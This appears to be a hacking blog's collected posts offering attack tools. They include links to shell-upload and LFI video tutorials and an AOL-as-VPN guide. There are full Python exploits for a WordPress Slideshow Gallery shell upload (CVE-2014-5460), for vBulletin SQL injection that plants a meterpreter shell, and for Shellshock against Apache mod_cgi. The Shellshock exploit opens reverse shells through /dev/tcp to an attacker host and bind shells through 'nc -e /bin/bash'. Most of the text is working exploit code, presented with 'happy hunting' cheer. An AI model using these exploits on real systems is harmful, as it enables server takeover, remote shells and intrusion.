This is video tutorial about uploading PHP Shell to target using php://input parameter.
An old video but still works untill now.

Tools needed for this trick is Live HTTP Header and Tamper Data from Mozilla Addons.
You can download the video here.

Thanks for download and watching.. :)


Here is my video tutorial about LFI injection using /proc/self/environ.
This an old trick but works till now.
For better view open the html file on your browser.
You can download it here
Tools: Mozilla Firefox & Tamper Data Plugin.
Thanks for watching.. :)


WordPress Slideshow Gallery 1.4.6 suffer for shell upload vuln.
Bug founded by Claudio Viviani.
This from last month bug but i think there is more target coz it's WordPress. :)

Description
Feature content in beatiful and fast JavaScript powered slideshow gallery showcases on your WordPress website. You can easily display multiple galleries throughout your WordPress website displaying your custom added slides, slide galleries or showing slides from WordPress posts/pages. The slideshow is flexible, all aspects can easily be configured and embedding/hardcoding the slideshow gallery is a breeze.
Here is the exploit and how to use it. Exploit written in python.
You can download it here
#!/usr/bin/env python## WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit## WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)## Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/## Exploit written by: Claudio Viviani - info@homelab.it - http://www.homelab.it### Disclaimer:## This exploit is intended for educational purposes only and the author# can not be held liable for any kind of damages done whatsoever to your machine,# or damages caused by some other,creative application of this exploit.# In any case you disagree with the above statement,stop here.### Requirements:## 1) Enabled user management slide# 2) python's httplib2 lib#    Installation: pip install httplib2## Usage:## python wp_gallery_slideshow_146_suv.py -t http[s]://localhost -u user -p pwd -f sh33l.php# python wp_gallery_slideshow_146_suv.py -t http[s]://localhost/wordpress -u user -p pwd -f sh33l.php# python wp_gallery_slideshow_146_suv.py -t http[s]://localhost:80|443 -u user -p pwd -f sh33l.php## Backdoor Location:## http://localhost/wp-content/uploads/slideshow-gallery/sh33l.php## Tested on Wordpress 3.6, 3.7, 3.8, 3.9, 4.0#
# http connectionimport urllib, httplib2, sys, mimetypes# Args managementimport optparse# Error managementimport socket, httplib, sys# file managementimport os, os.path
# Check urldef checkurl(url):    if url[:8] != "https://" and url[:7] != "http://":        print('[X] You must insert http:// or https:// procotol')        sys.exit(1)    else:        return url
# Check if file exists and has readabledef checkfile(file):    if not os.path.isfile(file) and not os.access(file, os.R_OK):        print '[X] '+file+' file is missing or not readable'        sys.exit(1)    else:        return file# Get file's mimetypedef get_content_type(filename):    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
# Create multipart headerdef create_body_sh3ll_upl04d(payloadname):
   getfields = dict()   getfields['Slide[id]'] = ''   getfields['Slide[order]'] = ''   getfields['Slide[title]'] = 'h0m3l4b1t'   getfields['Slide[description]'] = 'h0m3l4b1t'   getfields['Slide[showinfo]'] = 'both'   getfields['Slide[iopacity]'] = '70'   getfields['Slide[type]'] = 'file'   getfields['Slide[image_url]'] = ''   getfields['Slide[uselink]'] = 'N'   getfields['Slide[link]'] = ''   getfields['Slide[linktarget]'] = 'self'   getfields['Slide[title]'] = 'h0m3l4b1t'
   payloadcontent = open(payloadname).read()
   LIMIT = '----------lImIt_of_THE_fIle_eW_$'   CRLF = '\r\n'
   L = []   for (key, value) in getfields.items():      L.append('--' + LIMIT)      L.append('Content-Disposition: form-data; name="%s"' % key)      L.append('')      L.append(value)
   L.append('--' + LIMIT)   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('image_file', payloadname))   L.append('Content-Type: %s' % get_content_type(payloadname))   L.append('')   L.append(payloadcontent)   L.append('--' + LIMIT + '--')   L.append('')   body = CRLF.join(L)   return body
banner = """
 $$$$$$\  $$\ $$\       $$\                     $$\$$  __$$\ $$ |\__|      $$ |                    $$ |$$ /  \__|$$ |$$\  $$$$$$$ | $$$$$$\   $$$$$$$\ $$$$$$$\   $$$$$$\  $$\  $$\  $$\\$$$$$$\  $$ |$$ |$$  __$$ |$$  __$$\ $$  _____|$$  __$$\ $$  __$$\ $$ | $$ | $$ | \____$$\ $$ |$$ |$$ /  $$ |$$$$$$$$ |\$$$$$$\  $$ |  $$ |$$ /  $$ |$$ | $$ | $$ |$$\   $$ |$$ |$$ |$$ |  $$ |$$   ____| \____$$\ $$ |  $$ |$$ |  $$ |$$ | $$ | $$ |\$$$$$$  |$$ |$$ |\$$$$$$$ |\$$$$$$$\ $$$$$$$  |$$ |  $$ |\$$$$$$  |\$$$$$\$$$$  | \______/ \__|\__| \_______| \_______|\_______/ \__|  \__| \______/  \_____\____/


             $$$$$$\            $$\ $$\                                       $$\ $$\   $$\     $$$$$$\            $$  __$$\           $$ |$$ |                                    $$$$ |$$ |  $$ |   $$  __$$\            $$ /  \__| $$$$$$\  $$ |$$ | $$$$$$\   $$$$$$\  $$\   $$\       \_$$ |$$ |  $$ |   $$ /  \__|            $$ |$$$$\  \____$$\ $$ |$$ |$$  __$$\ $$  __$$\ $$ |  $$ |        $$ |$$$$$$$$ |   $$$$$$$\            $$ |\_$$ | $$$$$$$ |$$ |$$ |$$$$$$$$ |$$ |  \__|$$ |  $$ |        $$ |\_____$$ |   $$  __$$\            $$ |  $$ |$$  __$$ |$$ |$$ |$$   ____|$$ |      $$ |  $$ |        $$ |      $$ |   $$ /  $$ |            \$$$$$$  |\$$$$$$$ |$$ |$$ |\$$$$$$$\ $$ |      \$$$$$$$ |      $$$$$$\ $$\ $$ |$$\ $$$$$$  |             \______/  \_______|\__|\__| \_______|\__|       \____$$ |      \______|\__|\__|\__|\______/                                                            $$\   $$ |                                                            \$$$$$$  |                                                             \______/
                                                                   W0rdpr3ss Sl1d3sh04w G4ll3ry 1.4.6 Sh3ll Upl04d Vuln.
                          =============================================                          - Release date: 2014-08-28                          - Discovered by: Jesus Ramirez Pichardo                          - CVE: 2014-5460                          =============================================
                                          Written by:
                                        Claudio Viviani
                                     http://www.homelab.it
                                        info@homelab.it                                     homelabit@protonmail.ch
                                https://www.facebook.com/homelabit                                https://twitter.com/homelabit                                https://plus.google.com/+HomelabIt1/                      https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww"""
commandList = optparse.OptionParser('usage: %prog -t URL -u USER -p PASSWORD -f FILENAME.PHP [--timeout sec]')commandList.add_option('-t', '--target', action="store",                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",                  )commandList.add_option('-f', '--file', action="store",                  help="Insert file name, ex: shell.php",                  )commandList.add_option('-u', '--user', action="store",                  help="Insert Username",                  )commandList.add_option('-p', '--password', action="store",                  help="Insert Password",                  )commandList.add_option('--timeout', action="store", default=10, type="int",                  help="[Timeout Value] - Default 10",                  )
options, remainder = commandList.parse_args()
# Check argsif not options.target or not options.user or not options.password or not options.file:    print(banner)    commandList.print_help()    sys.exit(1)
payloadname = checkfile(options.file)host = checkurl(options.target)username = options.userpwd = options.passwordtimeout = options.timeout
print(banner)
url_login_wp = host+'/wp-login.php'url_admin_slideshow = host+'/wp-admin/admin.php?page=slideshow-slides&method=save'
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
http = httplib2.Http(disable_ssl_certificate_validation=True, timeout=timeout)
# Wordpress login POST Databody = { 'log':username,         'pwd':pwd,         'wp-submit':'Login',         'testcookie':'1' }# Wordpress login headers with Cookieheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',            'Content-type': 'application/x-www-form-urlencoded',            'Cookie': 'wordpress_test_cookie=WP+Cookie+check' }try:    response, content = http.request(url_login_wp, 'POST', headers=headers, body=urllib.urlencode(body))    if len(response['set-cookie'].split(" ")) < 4:    #if 'httponly' in response['set-cookie'].split(" ")[-1]:        print '[X] Wrong username or password'        sys.exit()    else:        print '[+] Username & password ACCEPTED!\n'
        # Create cookie for admin panel        if 'secure' in response['set-cookie']:            c00k13 = response['set-cookie'].split(" ")[6]+' '+response['set-cookie'].split(" ")[0]+' '+response['set-cookie'].split(" ")[10]        else:            c00k13 = response['set-cookie'].split(" ")[5]+' '+response['set-cookie'].split(" ")[0]+' '+response['set-cookie'].split(" ")[8]
        bodyupload = create_body_sh3ll_upl04d(payloadname)
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',                   'Cookie': c00k13,                   'content-type': content_type,                   'content-length': str(len(bodyupload)) }        response, content = http.request(url_admin_slideshow, 'POST', headers=headers, body=bodyupload)
        if 'admin.php?page=slideshow-slides&Galleryupdated=true&Gallerymessage=Slide+has+been+saved' in content:            print '[!] Shell Uploaded!'            print '[+] Check url: '+host+'/wp-content/uploads/slideshow-gallery/'+payloadname.lower()+' (lowercase!!!!)'        else:            print '[X] The user can not upload files or plugin fixed :((('
except socket.timeout:    print('[X] Connection Timeout')    sys.exit(1)except socket.error:    print('[X] Connection Refused')    sys.exit(1)except httplib.ResponseNotReady:    print('[X] Server Not Responding')    sys.exit(1)except httplib2.ServerNotFoundError:    print('[X] Server Not Found')    sys.exit(1)except httplib2.HttpLib2Error:    print('[X] Connection Error!!')    sys.exit(1)


In this tutorial, i will show you how to use AOL Desktop Software (version 9.1) as a Virtual Private Network (VPN).

First download AOL Desktop 9.1. Search on Google to download.

Register new email on mail.aol.com

After download, install AOL Desktop 9.1.

Let me check my IP address first. I have Indonesian IP address.












Open AOL 9.1 and click Connect Options













Then click Advanced Broadband Settings


















Click Continue










AOL Setup will be pop up, then choose Broadband tab and click Add a Broadband Profile















Fill the Profile Name for example aolvpn or whatever you like and click Add















On Connection Type choose Home Network and click Save















If AOL Desktop ask for username and password, fill it with the one that you created before.
On Connection choose Profile Name that you created. In this case my Profile Name is aolvpn.













Logging in to AOL...













Successfully connected to AOL












Check my IP address again.. It's changed now! yeey..












Well thats all.. :)
Let me know if you guys having trouble with this.. Save browsing folks!


  1. vBulletin (vB) is a proprietary Internet forum software package developed by vBulletin Solutions, Inc., a division of Internet Brands. It is written in PHP and uses a MySQL database server.
  2. This vulnerability founded by oststrom. Here the exploit code.
  3. #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    '''
    @author: tintinweb 0x721427D8
    '''
    import urllib2, cookielib, urllib, json, hashlib class Exploit(object):

    baseurl = None
    cookies = None

    def __init__(self,baseurl,params, debuglevel=1):
    self.cookies = cookielib.LWPCookieJar()
    handlers = [
    urllib2.HTTPHandler(debuglevel=debuglevel),
    urllib2.HTTPSHandler(debuglevel=debuglevel),
    urllib2.HTTPCookieProcessor(self.cookies)
    ]
    self.browser = urllib2.build_opener(*handlers)
    self.baseurl=baseurl
    self.params = params

    def call(self,path="",data={}):
    assert(isinstance(data,dict))
    data = urllib.urlencode(data) req = urllib2.Request("%s%s"%(self.baseurl,path),data)
    req.add_header("Content-Type", "application/x-www-form-urlencoded") return self.browser.open(req)

    def call_json(self,path=None,data={}):
    try:
    x=self.call(path,data).read()
    print "raw_response", x
    resp = json.loads(x)
    except urllib2.HTTPError, he:
    resp = he.read()
    return resp def vb_init_api(self):
    params = {'api_m':'api_init'}
    params.update(self.params)
    data = self.call_json("?%s"%(urllib.urlencode(params)))
    self.session = data
    return data

    def vb_call(self, params):
    api_sig = self._vb_build_api_sig(params)
    req_params = self._vb_build_regstring(api_sig)
    params.update(req_params)
    data = self.call_json("?%s"%(urllib.urlencode(params)),data=params)
    if not isinstance(data, dict):
    return data
    if 'errormessage' in data['response'].keys():
    raise Exception(data)
    return data def _ksort(self, d):
    ret = []
    for key, value in [(k,d[k]) for k in sorted(d.keys())]:
    ret.append( "%s=%s"%(key,value))
    return "&".join(ret) def _ksort_urlencode(self, d):
    ret = []
    for key, value in [(k,d[k]) for k in sorted(d.keys())]:
    ret.append( urllib.urlencode({key:value}))
    return "&".join(ret) def _vb_build_api_sig(self, params):
    apikey = self.params['apikey']
    login_string = self._ksort_urlencode(params)
    access_token = str(self.session['apiaccesstoken'])
    client_id = str(self.session['apiclientid'])
    secret = str(self.session['secret'])
    return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest()

    def _vb_build_regstring(self, api_sig):
    params = {
    'api_c':self.session['apiclientid'],
    'api_s':self.session['apiaccesstoken'],
    'api_sig':api_sig,
    'api_v':self.session['apiversion'],
    }
    return params
    if __name__=="__main__":
    TARGET = "http://192.168.220.131/vbb4/api.php"
    APIKEY = "4FAVcRDc"
    REMOTE_SHELL_PATH = "/var/www/myShell.php"
    TRIGGER_URL = "http://192.168.220.131/myShell.php"
    DEBUGLEVEL = 0 # 1 to enable request tracking
    ### 2. sqli - simple - write outfile
    print "[ 2 ] - sqli - inject 'into outfile' to create file xxxxx.php"
    params = {'clientname':'fancy_exploit_client',
    'clientversion':'1.0',
    'platformname':'exploit',
    'platformversion':'1.5',
    'uniqueid':'1234',
    'apikey':APIKEY}
    x = Exploit(baseurl=TARGET,params=params)

    vars = x.vb_init_api()
    print vars
    '''
    x.vb_call(params={'api_m':'breadcrumbs_create',
    'type':'t',
    #'conceptid':"1 union select 1 into OUTFILE '%s'"%REMOTE_SHELL_PATH,
    'conceptid':"1 union select 1 into OUTFILE '%s'"%(REMOTE_SHELL_PATH)
    })

    print "[ *] SUCCESS! - created file %s"%TRIGGER_URL
    '''
    ### 3. sqli - put meterpreter shell and trigger it
    print "[ 3 ] - sqli - meterpreter shell + trigger"
    with open("./meterpreter_bind_tcp") as f:
    shell = f.read() shell = shell.replace("","") #cleanup tags
    shell = shell.encode("base64").replace("\n","") #encode payload
    shell = ""%shell # add decoderstub
    shell = "0x"+shell.encode("hex") # for mysql outfile


    x.vb_call(params={'api_m':'breadcrumbs_create',
    'type':'t',
    'conceptid':"1 union select %s into OUTFILE '%s'"%(shell,REMOTE_SHELL_PATH)})
    print "[ *] SUCCESS! - triggering shell .. (script should not exit)"
    print "[ ] exploit: #> msfcli multi/handler PAYLOAD=php/meterpreter/bind_tcp LPORT=4444 RHOST= E"
    print "[ *] shell active ... waiting for it to die ..."
    print urllib2.urlopen(TRIGGER_URL)
    print "[ ] shell died!"
    print "-- quit --"


What si PayPal?
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet.

Well, a group of researcher called Vulnerability-Lab found a vulnerability in PayPal on iOS Mobile App.

What do you think when your hear PayPal bug? Yeah man! Money! :)

Check out the vulnerability here. Happy hunting!


Apache application mod_cgi is suffer for remote exploit (shellshock).
This vulnerability is found by Frederico Galatolo. The exploit is written in python.
Here is the code. Happy hunting!

#! /usr/bin/env python
from socket import *
from threading import Thread
import thread, time, httplib, urllib, sys
stop = False
proxyhost = ""
proxyport = 0
def usage():
print """
Shellshock apache mod_cgi remote exploit
Usage:
./exploit.py var=
Vars:
rhost: victim host
rport: victim port for TCP shell binding
lhost: attacker host for TCP shell reversing
lport: attacker port for TCP shell reversing
pages:  specific cgi vulnerable pages (separated by comma)
proxy: host:port proxy
Payloads:
"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)
Example:
./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payload=bind rhost=1.2.3.4 rport=1234
Credits:
Federico Galatolo 2014
"""
sys.exit(0)
def exploit(lhost,lport,rhost,rport,payload,pages):
headers = {"Cookie": payload, "Referer": payload}
for page in pages:
if stop:
return
print "[-] Trying exploit on : "+page
if proxyhost != "":
c = httplib.HTTPConnection(proxyhost,proxyport)
c.request("GET","http://"+rhost+page,headers=headers)
res = c.getresponse()
else:
c = httplib.HTTPConnection(rhost)
c.request("GET",page,headers=headers)
res = c.getresponse()
if res.status == 404:
print "[*] 404 on : "+page
time.sleep(1)

args = {}
for arg in sys.argv[1:]:
ar = arg.split("=")
args[ar[0]] = ar[1]
try:
args['payload']
except:
usage()
if args['payload'] == 'reverse':
try:
lhost = args['lhost']
lport = int(args['lport'])
rhost = args['rhost']
payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"
except:
usage()
elif args['payload'] == 'bind':
try:
rhost = args['rhost']
rport = args['rport']
payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'"
except:
usage()
else:
print "[*] Unsupported payload"
usage()
try:
pages = args['pages'].split(",")
except:
pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]
try:
proxyhost,proxyport = args['proxy'].split(":")
except:
pass
if args['payload'] == 'reverse':
serversocket = socket(AF_INET, SOCK_STREAM)
buff = 1024
addr = (lhost, lport)
serversocket.bind(addr)
serversocket.listen(10)
print "[!] Started reverse shell handler"
thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))
if args['payload'] == 'bind':
serversocket = socket(AF_INET, SOCK_STREAM)
addr = (rhost,int(rport))
thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))
buff = 1024
while True:
if args['payload'] == 'reverse':
clientsocket, clientaddr = serversocket.accept()
print "[!] Successfully exploited"
print "[!] Incoming connection from "+clientaddr[0]
stop = True
clientsocket.settimeout(3)
while True:
reply = raw_input(clientaddr[0]+"> ")
clientsocket.sendall(reply+"\n")
try:
data = clientsocket.recv(buff)
print data
except:
pass
if args['payload'] == 'bind':
try:
serversocket = socket(AF_INET, SOCK_STREAM)
time.sleep(1)
serversocket.connect(addr)
print "[!] Successfully exploited"
print "[!] Connected to "+rhost
stop = True
serversocket.settimeout(3)
while True:
reply = raw_input(rhost+"> ")
serversocket.sendall(reply+"\n")
data = serversocket.recv(buff)
print data
except:
pass